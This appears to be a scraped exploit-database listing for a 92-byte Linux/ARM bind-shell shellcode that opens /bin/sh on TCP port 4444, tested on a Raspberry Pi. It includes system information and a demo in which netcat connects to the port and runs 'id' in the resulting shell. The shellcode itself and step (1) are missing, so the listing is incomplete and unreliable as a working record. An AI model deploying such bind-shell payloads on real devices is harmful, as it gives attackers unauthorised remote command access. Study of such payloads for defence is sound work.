Exploits / Vulnerability Discovered : 2018-09-26 |
Type : shellcode |
Platform : arm
This exploit / vulnerability Linux/arm bind (0.0.0.0:4444/tcp) shell (/bin/sh) + nullfree shellcode (92 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
/*
# Title: Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)
# Date: 2018-09-26
# Tested: armv7l (Raspberry Pi 3 Model B+)
# Author: Ken Kitahara
[System Information]
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $
(2) Connect to 127.0.0.1:4444/TCP from another terminal.
pi@raspberrypi:~ $ nc -vv 127.0.0.1 4444
Connection to 127.0.0.1 4444 port [tcp/*] succeeded!
id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
exit
^C
pi@raspberrypi:~ $